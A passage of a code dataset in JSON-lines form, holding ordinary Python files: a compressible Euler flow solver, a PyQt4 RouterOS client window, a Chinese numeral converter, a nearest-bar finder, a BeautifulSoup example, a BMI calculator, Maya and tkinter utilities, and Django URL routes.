(qdata[2]-0.5*qdata[1]**2/qdata[0])*self.gamma/qdata[0]\n\n def ptot(self, qdata):\n gm1 = self.gamma-1.\n return self.pressure(qdata)*(1.+.5*gm1*self.mach(qdata)**2)**(self.gamma/gm1)\n\n def htot(self, qdata):\n ec = 0.5*qdata[1]**2/qdata[0]\n return ((qdata[2]-ec)*self.gamma + ec)/qdata[0]\n\n def numflux(self, name, pdataL, pdataR, dir=None):\n if name==None: name='hllc'\n return (self._numfluxdict[name])(pdataL, pdataR, dir)\n\n def numflux_centeredflux(self, pdataL, pdataR, dir=None): # centered flux ; pL[ieq][face]\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # final flux\n Frho = .5*( rhoL*unL + rhoR*unR )\n Frhou = .5*( (rhoL*unL**2 + pL) + (rhoR*unR**2 + pR))\n FrhoE = .5*( (rhoL*unL*HL) + (rhoR*unR*HR))\n\n return [Frho, Frhou, FrhoE]\n\n def numflux_centeredmassflow(self, pdataL, pdataR, dir=None): # centered flux ; pL[ieq][face]\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # final flux\n Frho = .5*( rhoL*unL + rhoR*unR )\n Frhou = .5*( Frho*(unL+unR) + pL + pR)\n FrhoE = .5*Frho*( HL + HR)\n\n return [Frho, Frhou, FrhoE]\n\n\n def numflux_hlle(self, pdataL, pdataR, dir=None): # HLLE Riemann solver ; pL[ieq][face]\n\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n HL = 
cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # The HLLE Riemann solver\n \n # sorry for using little \"e\" here - is is not just internal energy\n eL = HL-pL/rhoL\n eR = HR-pR/rhoR\n\n # Roe's averaging\n Rrho = np.sqrt(rhoR/rhoL)\n #\n tmp = 1.0/(1.0+Rrho);\n velRoe = tmp*(uL + uR*Rrho)\n uRoe = tmp*(uL + uR*Rrho)\n hRoe = tmp*(HL + HR*Rrho)\n\n gamPdivRho = tmp*( (cL2+0.5*gam1*uL*uL) + (cR2+0.5*gam1*uR*uR)*Rrho )\n cRoe = np.sqrt(gamPdivRho - gam1*0.5*velRoe**2)\n\n # max HLL 2 waves \"velocities\"\n sL = np.minimum(0., np.minimum(uRoe-cRoe, unL-np.sqrt(cL2)))\n sR = np.maximum(0., np.maximum(uRoe+cRoe, unR+np.sqrt(cR2)))\n\n # final flux\n Frho = (sR*rhoL*unL - sL*rhoR*unR + sL*sR*(rhoR-rhoL))/(sR-sL)\n Frhou = (sR*(rhoL*unL**2 + pL) - sL*(rhoR*unR**2 + pR) + sL*sR*(rhoR*unR-rhoL*unL))/(sR-sL)\n FrhoE = (sR*(rhoL*unL*HL) - sL*(rhoR*unR*HR) + sL*sR*(rhoR*eR-rhoL*eL))/(sR-sL)\n\n return [Frho, Frhou, FrhoE]\n\n def numflux_hllc(self, pdataL, pdataR, dir=None): # HLLC Riemann solver ; pL[ieq][face]\n\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL = pdataL[0]\n uL = unL = pdataL[1]\n pL = pdataL[2]\n rhoR = pdataR[0]\n uR = unR = pdataR[1]\n pR = pdataR[2]\n\n cL2 = gam*pL/rhoL\n cR2 = gam*pR/rhoR\n\n # the enthalpy is assumed to include ke ...!\n HL = cL2/gam1 + 0.5*uL**2\n HR = cR2/gam1 + 0.5*uR**2\n\n # The HLLC Riemann solver\n \n # sorry for using little \"e\" here - is is not just internal energy\n eL = HL-pL/rhoL\n eR = HR-pR/rhoR\n\n # Roe's averaging\n Rrho = np.sqrt(rhoR/rhoL)\n\n tmp = 1.0/(1.0+Rrho);\n velRoe = tmp*(uL + uR*Rrho)\n uRoe = tmp*(uL + uR*Rrho)\n hRoe = tmp*(HL + HR*Rrho)\n\n gamPdivRho = tmp*( (cL2+0.5*gam1*uL*uL) + (cR2+0.5*gam1*uR*uR)*Rrho )\n cRoe = np.sqrt(gamPdivRho - gam1*0.5*velRoe**2)\n\n # speed of sound at L and R\n sL = np.minimum(uRoe-cRoe, unL-np.sqrt(cL2))\n sR = np.maximum(uRoe+cRoe, unR+np.sqrt(cR2))\n\n # speed of contact surface\n sM = (pL-pR-rhoL*unL*(sL-unL)+rhoR*unR*(sR-unR))/(rhoR*(sR-unR)-rhoL*(sL-unL))\n\n # pressure at right and left (pR=pL) side of contact surface\n pStar = rhoR*(unR-sR)*(unR-sM)+pR\n\n # should not be computed if totally upwind\n SmoSSm = np.where(sM >= 0.,\n sM/(sL-sM),\n sM/(sR-sM))\n SmUoSSm = np.where(sM >= 0.,\n (sL-unL)/(sL-sM),\n (sR-unR)/(sR-sM))\n\n Frho = np.where(sM >= 0.,\n np.where(sL >= 0.,\n rhoL*unL,\n rhoL*sM*SmUoSSm),\n np.where(sR <= 0.,\n rhoR*unR,\n rhoR*sM*SmUoSSm))\n\n Frhou = np.where(sM >= 0.,\n np.where(sL >= 0.,\n Frho*uL+pL,\n Frho*uL + (pStar-pL)*SmoSSm + pStar),\n np.where(sR <= 0.,\n Frho*uR+pR,\n Frho*uR + (pStar-pR)*SmoSSm + pStar) )\n\n FrhoE = np.where(sM >= 0.,\n np.where(sL >= 0.,\n rhoL*HL*unL,\n Frho*eL + (pStar*sM-pL*unL)*SmoSSm + pStar*sM),\n np.where(sR <= 0.,\n rhoR*HR*unR,\n Frho*eR + (pStar*sM-pR*unR)*SmoSSm + pStar*sM))\n\n return [Frho, Frhou, FrhoE]\n\n def timestep(self, data, dx, condition):\n \"computation of timestep: data(=pdata) is not used, dx is an array of cell sizes, condition is the CFL number\"\n # dt = CFL * dx / ( |u| + c )\n # dt = np.zeros(len(dx)) #test use zeros instead\n #dt = condition*dx/ (data[1] + np.sqrt(self.gamma*data[2]/data[0]) )\n Vmag = self.velocitymag(data)\n dt = condition*dx / ( Vmag + np.sqrt(self.gamma*(self.gamma-1.0)*(data[2]/data[0]-0.5*Vmag**2) ))\n return dt\n\n\n# ===============================================================\n# implementation of euler 1D class\n\nclass euler1d(base):\n \"\"\"\n Class model for 2D euler equations\n \"\"\"\n def __init__(self, gamma=1.4, source=None):\n base.__init__(self, gamma=gamma, 
source=source)\n self.shape = [1, 1, 1]\n self._vardict = { 'pressure': self.pressure, 'density': self.density,\n 'velocity': self.velocity, 'mach': self.mach, 'enthalpy': self.enthalpy,\n 'entropy': self.entropy, 'ptot': self.ptot, 'htot': self.htot }\n self._bcdict.update({'sym': self.bc_sym,\n 'insub': self.bc_insub,\n 'insup': self.bc_insup,\n 'outsub': self.bc_outsub,\n 'outsup': self.bc_outsup })\n self._numfluxdict = { 'hllc': self.numflux_hllc, 'hlle': self.numflux_hlle, \n 'centered': self.numflux_centeredflux, 'centeredmassflow': self.numflux_centeredmassflow }\n\n def _derived_fromprim(self, pdata, dir):\n \"\"\"\n returns rho, un, V, c2, H\n 'dir' is ignored\n \"\"\"\n c2 = self.gamma * pdata[2] / pdata[0]\n H = c2/(self.gamma-1.) + .5*pdata[1]**2\n return pdata[0], pdata[1], pdata[1], c2, H\n\n def bc_sym(self, dir, data, param):\n \"symmetry boundary condition, for inviscid equations, it is equivalent to a wall, do not need user parameters\"\n return [ data[0], -data[1], data[2] ]\n\n def bc_insub(self, dir, data, param):\n g = self.gamma\n gmu = g-1.\n p = data[2]\n m2 = np.maximum(0., ((param['ptot']/p)**(gmu/g)-1.)*2./gmu)\n rh = param['ptot']/param['rttot']/(1.+.5*gmu*m2)**(1./gmu)\n return [ rh, -dir*np.sqrt(g*m2*p/rh), p ] \n\n def bc_insup(self, dir, data, param):\n # expected parameters are 'ptot', 'rttot' and 'p'\n g = self.gamma\n gmu = g-1.\n m2 = np.maximum(0., ((param['ptot']/param['p'])**(gmu/g)-1.)*2./gmu)\n rh = param['ptot']/param['rttot']/(1.+.5*gmu*m2)**(1./gmu)\n return param\n\n def bc_outsub(self, dir, data, param):\n return [ data[0], data[1], param['p'] ] \n\n def bc_outsup(self, dir, data, param):\n return data\n\nclass model(euler1d): # backward compatibility\n pass\n\n# ===============================================================\n# implementation of derived MODEL class\n\nclass nozzle(euler1d):\n \"\"\"\n Class nozzle for euler equations with section term -1/A dA/dx (rho u, rho u2, rho u Ht)\n\n attributes:\n\n \"\"\"\n def __init__(self, sectionlaw, gamma=1.4):\n euler1d.__init__(self, gamma=gamma, source=[ self.src_mass, self.src_mom, self.src_energy ])\n self.sectionlaw = sectionlaw\n \n def initdisc(self, mesh):\n self.geomterm = 1./self.sectionlaw(mesh.centers())* \\\n (self.sectionlaw(mesh.xf[1:mesh.ncell+1])-self.sectionlaw(mesh.xf[0:mesh.ncell])) / \\\n (mesh.xf[1:mesh.ncell+1]-mesh.xf[0:mesh.ncell])\n return \n\n def src_mass(self, x, qdata):\n return -self.geomterm * qdata[1]\n\n def src_mom(self, x, qdata):\n return -self.geomterm * qdata[1]**2/qdata[0]\n\n def src_energy(self, x, qdata):\n ec = 0.5*qdata[1]**2/qdata[0]\n return -self.geomterm * qdata[1] * ((qdata[2]-ec)*self.gamma + ec)/qdata[0]\n\n# ===============================================================\n# implementation of euler 2D class\n\nclass euler2d(base):\n \"\"\"\n Class model for 2D euler equations\n \"\"\"\n def __init__(self, gamma=1.4, source=None):\n base.__init__(self, gamma=gamma, source=source)\n self.shape = [1, 2, 1]\n self._vardict = { 'pressure': self.pressure, 'density': self.density,\n 'velocity': self.velocity, 'velocity_x': self.velocity_x, 'velocity_y': self.velocity_y,\n 'mach': self.mach, 'enthalpy': self.enthalpy,\n 'entropy': self.entropy, 'ptot': self.ptot, 'htot': self.htot }\n self._bcdict.update({ #'sym': self.bc_sym,\n # 'insub': self.bc_insub,\n # 'insup': self.bc_insup,\n # 'outsub': self.bc_outsub,\n # 'outsup': self.bc_outsup \n })\n self._numfluxdict = { #'hllc': self.numflux_hllc, 'hlle': self.numflux_hlle, \n 'centered': 
self.numflux_centeredflux }\n\n def _derived_fromprim(self, pdata, dir):\n \"\"\"\n returns rho, un, V, c2, H\n 'dir' is ignored\n \"\"\"\n c2 = self.gamma * pdata[2] / pdata[0]\n un = _vec_dot_vec(pdata[1], dir) \n H = c2/(self.gamma-1.) + .5*_vecmag(pdata[1])\n return pdata[0], un, pdata[1], pdata[2], H, c2\n\n def velocity_x(self, qdata): # returns (rho ux)/rho\n return qdata[1][0,:]/qdata[0]\n\n def velocity_y(self, qdata): # returns (rho uy)/rho\n return qdata[1][1,:]/qdata[0]\n\n def mach(self, qdata):\n rhoUmag = _vecmag(qdata[1])\n return rhoUmag/np.sqrt(self.gamma*((self.gamma-1.0)*(qdata[0]*qdata[2]-0.5*rhoUmag**2)))\n\n def numflux_centeredflux(self, pdataL, pdataR, dir): # centered flux ; pL[ieq][face]\n gam = self.gamma\n gam1 = gam-1.\n\n rhoL, unL, VL, pL, HL, cL2 = self._derived_fromprim(pdataL, dir)\n rhoR, unR, VR, pR, HR, cR2 = self._derived_fromprim(pdataR, dir)\n \n # final flux\n Frho = .5*( rhoL*unL + rhoR*unR )\n Frhou = .5*( (rhoL*unL)*VL + pL*dir + (rhoR*unR)*VR + pR*dir)\n FrhoE = .5*( (rhoL*unL*HL) + (rhoR*unR*HR))\n\n return [Frho, Frhou, FrhoE]\n\n# ===============================================================\n# automatic testing\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n\n","sub_path":"flowdyn/modelphy/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":15048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"578649685","text":"#!/usr/bin/env python \n#coding:utf-8\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport utility\nfrom APIRos import ApiRos,TrafficApiRos\n\n\nfrom mainLeftControl import TWMainUiLeft\n# from mainBottomRightCtl import TWMainUiBottomRight\nfrom mainTopRightControl import TWMainUiTopRight\n\n\nclass TWMainUi(QMainWindow):\n\n\tdef __init__(self, loginControl,rosApi,sIp,sPort,sUser,sPwd):\n\t\tsuper(TWMainUi, self).__init__()\n\t\tself.loginControl = loginControl\n\t\tself.rosApi = rosApi\n\t\tself.sIp,self.sPort,self.sUser,self.sPwd = sIp,sPort,sUser,sPwd\n\t\tself.twInitUi()\n\t\tself.setWindowFlags(Qt.WindowMinimizeButtonHint) # PyQT禁止窗口最大化按钮:\n\t\tscreen = QDesktopWidget().screenGeometry()\n\t\tself.setFixedSize(screen.width(),screen.height()) # PyQT禁止调整窗口大小:\n\t\t# self.setFixedSize(self.width(), self.height()) # PyQT禁止调整窗口大小:\n\t\tself.setWindowTitle(self.tr(self.sIp + \":\" + self.sPort + \"|\" + self.sUser))\n\n\tdef twInitUi(self):\n\t\tvboxRoot = QVBoxLayout()\n\t\t#中间部分\n\t\thbox = QHBoxLayout()\n\t\t#中间 左边\n\t\tself.leftMainCtl = TWMainUiLeft(self, self.rosApi)\n\t\thbox.addWidget(self.leftMainCtl)\n\t\t#中间 右边\n\t\tvboxRight = QVBoxLayout()\n\n\t\trightTop = QWidget(self)\n\t\t# rightTop.setStyleSheet(\"QWidget{background-color:#F00}\")\n\t\tself.rightMid = TWMainUiTopRight(self, self.leftMainCtl, self.rosApi)\n\t\trightBottom = QWidget(self)\n\n\t\tvboxRight.addWidget(rightTop)\n\t\tvboxRight.addWidget(self.rightMid)\n\t\tvboxRight.addWidget(rightBottom)\n\n\t\tvboxRight.setStretchFactor(rightTop,1)\n\t\tvboxRight.setStretchFactor(self.rightMid,1)\n\t\tvboxRight.setStretchFactor(rightBottom,1)\n\n\t\t#底部\n\t\thbox.addLayout(vboxRight)\n\t\tvboxRoot.addLayout(hbox)\n\n\t\thbox.setStretchFactor(self.leftMainCtl, 1)\n\t\thbox.setStretchFactor(vboxRight, 4)\n\n\t\tvboxRoot.setStretchFactor(hbox, 97)\n\n\t\tw = QWidget(self)\n\t\tw.setStyleSheet(\"QWidget{background-color:#4ABDE0}\")\n\t\tw.setLayout(vboxRoot)\n\t\tself.setCentralWidget(w)\n\t\t# self.statusBar().showMessage(self.tr(self.sIp + \":\" + self.sPort + 
\"|\" + self.sUser))\n\t\tlogo=QWidget(self)\n\n\t\tscreen = QDesktopWidget().screenGeometry()\n\t\tiWidth = screen.width()\n\t\tif iWidth <=1024:\n\t\t\tlogo.setGeometry(0, 0, 256, 85)\n\t\telif iWidth <=1366:\n\t\t\tlogo.setGeometry(0, 0, 341, 113)\n\t\telif iWidth <= 1600:\n\t\t\tlogo.setGeometry(0, 0, 400, 133)\n\t\telse:\n\t\t\tlogo.setGeometry(0, 0, 400, 133)\n\t\ts = \"QWidget{background-image:url(./images/%s);background-repeat:no-repeat;background-position:center;}\"%utility.getBackGroundName()\n\t\tlogo.setStyleSheet(s)\n\n\t# def closeEvent(self, event):\n\t# \tif self.loginControl.removeMainUI(self):\n\t# \t\tevent.accept()\n\t# \t\t#子控件可在这里添加\n\t# \t\tself.rightMid.twHideAllChild()\n\t# \telse:\n\t# \t\tprint \"remove error\"\n\t\n\tdef show(self):\n\t\tutility.twHalfScreenSize(self) \n\t\tQWidget.show(self)\n\n\tdef setRightModel(self,twModel):\n\t\tself.rightMid.setRightModel(twModel)\n\n\tdef setRightTitle(self,sText):\n\t\tself.rightMid.twsetTitleInfo(sText)\n\n\tdef login(self):\n\t\tself.rosApi.setLoginParams(self.sIp,self.sPort,self.sUser,self.sPwd)\n\t\tself.rosApi.login()\n\t\tself.show()\n\n\tdef newTWTrafficApi(self):\n\t\tapiRos = TrafficApiRos()\n\t\tapiRos.setLoginParams(self.sIp,self.sPort,self.sUser,self.sPwd)\n\t\tapiRos.login()\n\t\treturn apiRos\n\n\tdef close(self):\n\t\tsuper(TWMainUi, self).close()\n\t\tself.rightMid.hide()\n\n","sub_path":"TWControl/mainControl.py","file_name":"mainControl.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247946145","text":"def convert(num):\n if num == 0: return \"零\"\n digit2word = [\"零\", \"一\", \"二\", \"三\", \"四\", \"五\", \"六\", \"七\", \"八\", \"九\"]\n unit1 = [\"\", \"万\", \"亿\"]\n unit2 = [\"\", \"十\", \"百\", \"千\"]\n \n unit1_idx = 0\n ss = \"\"\n while num > 0:\n four_digit = [] # 个 十 百 千\n # 从右向左 每次取四位数\n for _ in range(4):\n if num == 0: break\n temp = num%10\n num = int(num/10)\n four_digit.append(temp)\n \n def convert_four(four_digit):\n result = \"\"\n for i in range(len(four_digit)):\n if result == \"\" and four_digit[i] == 0: continue #忽略零\n if result != \"\" and four_digit[i] == 0 and four_digit[i-1] == 0: continue #多个零相连,只读一个\n\n if i == 1 and four_digit[i] == 1 and i == len(four_digit) - 1:\n #十位的时候,如果是1,不读一十,而只读十,如11读十一而非一十一,但111又读成一百一十一,所以要看当前i是不是最大的一位\n result = unit2[i] + result\n elif four_digit[i] == 0: #0不要单位\n result = digit2word[four_digit[i]] + result\n else:\n result = digit2word[four_digit[i]] + unit2[i] + result\n return result\n \n #以四位为一组\n ss = convert_four(four_digit) + unit1[unit1_idx] + ss \n unit1_idx += 1\n\n return ss\n\nprint(convert(12001))\nfor i in range(99999):\n print(i)\n print(convert(i))\n","sub_path":"练习/数字转中文读音.py","file_name":"数字转中文读音.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"84985649","text":"import os\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport pylab\n\nfrom Method.LoadedPath import LoadedPath\nfrom Method.DataTransfer import DataTransfer\n\n\nclass Scatter2:\n\n def __init__(self):\n self.org_node = LoadedPath.get_org_node()\n self.latitude, self.longitude = DataTransfer.node_transform(self.org_node)\n\n def scatter2(self, data, num=0):\n plt.figure(figsize=(12, 8), dpi=100)\n plt.subplot(111)\n np.random.seed(19680801)\n random_color = np.random.rand(len(data), 3)\n for cluster, color in zip(data, random_color):\n 
longitude, latitude = [], []\n for e in cluster:\n longitude.append(self.longitude[int(e)])\n latitude.append(self.latitude[int(e)])\n if len(cluster) > 1:\n plt.scatter(latitude, longitude, marker='o', c=color)\n else:\n plt.scatter(latitude, longitude, marker='X', c='black', s=120)\n\n plt.title(str(num) + '_DBScan Scatter2', fontsize=12)\n plt.xlabel('x', fontsize=12)\n plt.ylabel('y', fontsize=12)\n\n rel_path = \"../data/easy_oldenburg/DBScan_scatter.png\"\n abs_path = os.path.join(os.path.dirname(__file__), rel_path)\n # plt.savefig(abs_path, dpi=300)\n plt.savefig('C:\\\\Users\\\\yuren\\\\Desktop\\\\DBScan\\\\Cluster\\\\' + str(num) + '_cluster.png')\n plt.show()\n","sub_path":"Graph/Scatter2.py","file_name":"Scatter2.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"470148849","text":"import json\nimport sys\nimport os\n\n\ndef load_from_json(filepath):\n with open(filepath, 'r') as file_handler:\n return json.load(file_handler)\n\n\ndef get_biggest_bar(bar_data):\n biggest_bar = max(bar_data['features'], key=lambda x:\n x['properties']['Attributes']['SeatsCount'])\n biggest_bar_seats = biggest_bar['properties']['Attributes']['SeatsCount']\n biggest_bar_data = [biggest_bar['properties']['Attributes']['Name'],\n biggest_bar['properties']['Attributes']['Address'],\n 'Мест:' + str(biggest_bar_seats)]\n return biggest_bar_data\n\n\ndef get_smallest_bar(bar_data):\n smallest_bar = min(bar_data['features'], key=lambda x:\n x['properties']['Attributes']['SeatsCount'])\n smallest_bar_seats = smallest_bar['properties']['Attributes']['SeatsCount']\n smallest_bar_data = [smallest_bar['properties']['Attributes']['Name'],\n smallest_bar['properties']['Attributes']['Address'],\n 'Мест:'+str(smallest_bar_seats)]\n return smallest_bar_data\n\n\ndef get_closest_bar(bar_data, longitude, latitude):\n closest_bar = min(bar_data['features'], key=lambda x:\n (x['geometry']['coordinates'][0] - longitude)**2 +\n (x['geometry']['coordinates'][1] - latitude)**2)\n closest_bar_seats = closest_bar['properties']['Attributes']['SeatsCount']\n closest_bar_data = [closest_bar['properties']['Attributes']['Name'],\n closest_bar['properties']['Attributes']['Address'],\n 'Мест:'+str(closest_bar_seats)]\n return closest_bar_data\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Error: define file path')\n print('Usage example: python pprint_json.py ')\n else:\n if os.path.isfile(sys.argv[1]):\n bar_data = load_from_json(sys.argv[1])\n longitude = float(input('Your longitude: '))\n latitude = float(input('Your latitude: '))\n biggest_bar = get_biggest_bar(bar_data)\n smallest_bar = get_smallest_bar(bar_data)\n closest_bar = get_closest_bar(bar_data, longitude, latitude)\n print('Biggest bar: \\n' + '\\n'.join(biggest_bar) + '\\n')\n print('Smallest bar: \\n' + '\\n'.join(smallest_bar) + '\\n')\n print('Closest bar: \\n' + '\\n'.join(closest_bar))\n\n else:\n print('Error: No such file in directory')\n","sub_path":"bars.py","file_name":"bars.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38723096","text":"from bs4 import BeautifulSoup # BeautifulSoup4 package\r\nfrom urllib.request import urlopen\r\nimport os\r\n\r\n# Grab the HTML from a web page just like we did\r\n# in the first example\r\nmy_address = \"http://www.example.com\"\r\nhtml_page = urlopen(my_address)\r\nhtml_text = html_page.read()\r\n\r\n# 
Pass the HTML to the BeautifulSoup constructor.\r\n# The second argument tells beautifulsoup which parser to use\r\nsoup = BeautifulSoup(html_text, \"lxml\")\r\n\r\nresult = soup.get_text()\r\ntext = os.linesep.join([s for s in result.splitlines() if s])\r\n\r\nprint(text)\r\n","sub_path":"beautiful_soup.py","file_name":"beautiful_soup.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"619550011","text":"#Pedro Cortés Soberanes A01374919\n#Función: Calcular IMC y calcular estado\n\n#Calcular IMC\ndef calcularIMC (peso,estatura):\n imc = (peso)/((estatura)*(estatura))\n\n return imc\n\n#Calcular estado con base en el IMC\ndef calcularEstado (imc):\n if imc<18.5:\n x = (\"Bajo Peso\")\n if imc>=18.5 and imc<=25:\n x = (\"Peso Normal\")\n if imc>25:\n x = (\"Sobrepeso\")\n return x\n\n\ndef main():\n pesoKg = float(input(\"Teclea tu peso en kilogramos: \"))\n estaturaM = float(input(\"Teclea tu estatura en metros: \"))\n imc = calcularIMC(pesoKg,estaturaM)\n print(\" -Tu IMC es de: %.2f \" % imc)\n estado = calcularEstado(imc)\n print(\" -Tu estado es de: \" ,estado)\n\n\nmain()","sub_path":"IMC.py","file_name":"IMC.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"197092100","text":"from tkinter import Tk, Scrollbar, Text, VERTICAL, RIGHT, LEFT, BOTH, END, Y, FLAT, DISABLED, WORD\nfrom tkinter.font import Font\nimport keyboard\n\nfrom conf import Conf\n\nPOPUP_MAX_WIDTH = 700\nPOPUP_MAX_HEIGHT = 400\nPADDING = 20\n\nclass Popup:\n def __init__(self, org_text, translated_text, is_uicontrol_label):\n self.org_text = org_text\n self.translated_text = translated_text\n self.is_uicontrol_label = is_uicontrol_label\n self.displayed_text = ''\n self.conf = Conf.get_instance()\n self.popup = None\n self.text_widget = None\n self.font = None\n\n def show(self):\n self.__create_popup_window()\n self.__create_font_widget()\n self.__create_text_widget()\n self.__set_popup_size_and_pos()\n self.__set_evenbinding()\n self.__set_focus()\n\n self.popup.mainloop()\n\n def __create_popup_window(self):\n # Create a popup (= the root/master window) and set its properties\n self.popup = Tk()\n self.popup.title('Popup Translator')\n self.popup.attributes('-topmost', True) # Always on top\n self.popup.attributes('-toolwindow', True) # No icon on taskbar, no icon on menu, no min button, no max button\n self.popup.configure(bg=self.conf.get_popup_bkcolor())\n\n # Scrollbar\n vbar = Scrollbar(self.popup, orient=VERTICAL)\n vbar.pack(side=RIGHT, fill=Y)\n # FIXME: Scrollbar works with mouse wheel, but doesn't work with mouse click\n # Note: We don't need a horizontial scrollbar because out-of-width text is automatically wrapped\n # hbar = Scrollbar(self.popup, orient=HORIZONTAL)\n # hbar.pack(side=BOTTOM, fill=X)\n\n def __create_text_widget(self):\n # Choose text to display on popup\n if self.is_uicontrol_label:\n self.displayed_text = self.org_text + '\\n' + '===\\n' + self.translated_text\n else:\n self.displayed_text = self.translated_text\n\n # Add text to popup\n self.text_widget = Text(self.popup)\n self.text_widget.insert(END, self.displayed_text)\n self.text_widget.pack(side=LEFT, fill=BOTH, expand=True)\n self.text_widget.configure(bg=self.popup.cget('bg'), relief=FLAT, state=DISABLED, font=self.font, wrap=WORD)\n\n def __create_font_widget(self):\n self.font = Font(root=self.popup, family=self.conf.get_font(), 
size=self.conf.get_fontsize())\n\n def __set_popup_size_and_pos(self):\n ''' Set size and position for the popup\n Details:\n - Popup size fits the text size (both horizonal and vertical side),\n but the text size cannot exceed POPUP_MAX_WIDTH or POPUP_MAX_HEIGHT\n - Popup position is at the cursor position\n '''\n ###### Size #####\n # Warning: Cannot measure(self.displayed_text) because the measure() method considers multiple lines as one line, making the width in pixels too wrong\n text_width_in_pixels = 0\n if not self.is_uicontrol_label:\n text_width_in_pixels = self.font.measure(self.translated_text)\n else:\n translated_text_width = self.font.measure(self.translated_text)\n org_text_width = self.font.measure(self.org_text)\n text_width_in_pixels = translated_text_width if translated_text_width > org_text_width else org_text_width\n\n popup_width = 0\n if text_width_in_pixels < POPUP_MAX_WIDTH: # Warning: pixels of text width and of popup width are slightly different even when the same length. Cannot know why ??\n # Therefore, popup size does not fit the text size exactly, just acceptable in most cases\n popup_width = text_width_in_pixels + PADDING*2\n else:\n popup_width = POPUP_MAX_WIDTH + PADDING\n\n line_sum = text_width_in_pixels/POPUP_MAX_WIDTH\n popup_height = line_sum*self.font.metrics(\"linespace\") + PADDING\n if (line_sum) < 1:\n line_sum = 1\n\n # For UI control label, we have to display both orginal text and translated text (plus a separate line at between),\n # we have to triple the height of popup\n if self.is_uicontrol_label:\n popup_height = 3*popup_height\n\n if popup_height > POPUP_MAX_HEIGHT:\n popup_height = POPUP_MAX_HEIGHT + PADDING\n\n ###### Position ######\n cursor_pos_x, cursor_pos_y = self.popup.winfo_pointerxy()\n\n ###### It's time to set popup size and position #######\n self.popup.geometry(\"%dx%d+%d+%d\" % (popup_width, popup_height, cursor_pos_x + 5, cursor_pos_y + 5))\n\n def __set_evenbinding(self):\n # What to do if popup is out of focus? (close the popup)\n self.popup.bind('', self.__on_focus_out)\n\n # What to do is a key (or hotkey) is pressed\n self.popup.bind('', self.__on_key_pressed)\n\n def __set_focus(self):\n ''' Force to focus on the popup when it's displayed '''\n self.popup.focus_force()\n\n def __on_focus_out(self, event):\n ''' Close the popup when clicking anywhere outside of it '''\n if self.conf.get_is_close_popup_when_outoffocus():\n self.popup.destroy()\n\n def __on_key_pressed(self, event):\n ''' Close the popup when the starting hotkey is press\n Details: When the next text is translated, the current popup is closed and the new popup is shown.\n This is useful when translating items in the UI content menu. 
'''\n if keyboard.is_pressed(self.conf.get_hotkey()):\n self.popup.destroy()","sub_path":"PopupTranslator/PopupTranslator/src/popup.py","file_name":"popup.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"129259503","text":"#Zed Benntt 2010\n#Remove selection and all descendants from current render layer\n\nimport maya.cmds as cmds\ndef RLremove():\n currentLayer=cmds.editRenderLayerGlobals(q=1,crl=1)\n cmds.select(hi=1)\n sel=cmds.ls(sl=1, fl=1)\n for each in sel:\n cmds.editRenderLayerMembers(currentLayer, each, r=1)","sub_path":"scripts/python/maya/lighting/zb_RLremove.py","file_name":"zb_RLremove.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"593652856","text":"from django.urls import include, path\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = \"warehouse_viewer\"\nurlpatterns = [\n url(r'^warehouse_viewer/$', views.viewer, name=\"viewer\"),\n url(r'^index/$', views.viewer, name=\"index\"),\n url(r'^$', views.viewer, name=\"index-blank\"),\n url(r'^upload/$', views.upload, name=\"upload\"),\n url(r'^adv_search/$', views.adv_search, name=\"adv_search\"),\n\n url(r'^search_ajax/$', views.search_ajax, name=\"search_ajax\"),\n url(r'^adv_search_ajax/$', views.adv_search_ajax, name=\"adv_search_ajax\"),\n path('update_loc/', views.update_locs, name=\"update_locs\"),\n # url(r'^request_grid_map_ajax/$', ajax_func.get_grid_ajax, name=\"request_grid_map_ajax\"),\n # url(r'^request_date_ajax/$', ajax_func.get_proc_dates, name=\"request_date_ajax\"),\n # 